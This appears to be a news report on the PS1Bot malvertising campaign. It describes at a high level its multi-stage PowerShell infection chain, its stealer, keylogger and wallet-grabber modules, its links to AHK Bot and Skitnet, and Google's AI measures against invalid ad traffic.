Cybersecurity researchers have uncovered a new and sophisticated malvertising campaign that is actively infecting users with a multi-stage malware framework known as PS1Bot. This threat, which has been active since early 2025, utilizes malvertising and search engine optimization (SEO) poisoning to deliver its initial payload. Once a victim downloads a malicious compressed archive, a JavaScript payload inside the ZIP file initiates a series of events, leading to the execution of a PowerShell script. This script acts as the core component, reaching out to a command-and-control (C2) server to fetch further modules, each designed for a specific malicious purpose.
PS1Bot is characterized by its modular design, allowing threat actors to deploy various functionalities on compromised systems as needed. The malware is designed with stealth as a priority, employing in-memory execution techniques to avoid leaving persistent artifacts on the victim’s machine, thereby minimizing its forensic trail. Researchers from Cisco Talos have identified several modules, including an information stealer, a keylogger, a screen capture tool, and a wallet grabber. The information stealer, in particular, is highly targeted, using embedded wordlists to find files containing passwords and cryptocurrency wallet seed phrases. This modularity offers significant flexibility, enabling attackers to rapidly update or add new capabilities to the malware.
The campaign and the PS1Bot malware show notable overlaps with previously documented cyber threats, suggesting a connection to known threat actor groups. PS1Bot shares technical similarities with AHK Bot, an AutoHotkey-based malware previously used by groups like Asylum Ambuscade and TA866. Furthermore, this activity cluster has been linked to prior ransomware campaigns that utilized a malware called Skitnet (also known as Bossnet). These connections indicate that the actors behind PS1Bot may be experienced and are likely leveraging their existing toolkit and tactics to expand their malicious operations, including data theft and establishing remote control over infected hosts.
The initial infection vector typically starts with a user encountering a malicious ad or a poisoned search result. The user is then tricked into downloading a ZIP file. The JavaScript payload within this archive fetches and executes a scriptlet from an external server, which subsequently writes and runs a PowerShell script on the disk. This script, once active, establishes communication with the C2 server to download and execute additional PowerShell commands. The modular nature of the malware allows the attackers to augment its functionality in real-time, performing actions from simple system reconnaissance to highly invasive data theft, all while working to maintain persistent access to the compromised machine.
This disclosure about the PS1Bot campaign comes as Google announced its use of AI and large language models (LLMs) to combat invalid traffic (IVT) and deceptive ad practices. Google’s new AI-powered systems are designed to analyze ad placements, app and web content, and user interactions to more precisely identify invalid behaviors. The company claims these new applications have already led to a 40% reduction in IVT stemming from deceptive ad serving practices. While Google’s efforts are focused on improving ad quality and safety, the discovery of the PS1Bot campaign highlights the ongoing and evolving challenge of malvertising and the sophisticated techniques threat actors are employing to bypass security measures.
Reference:
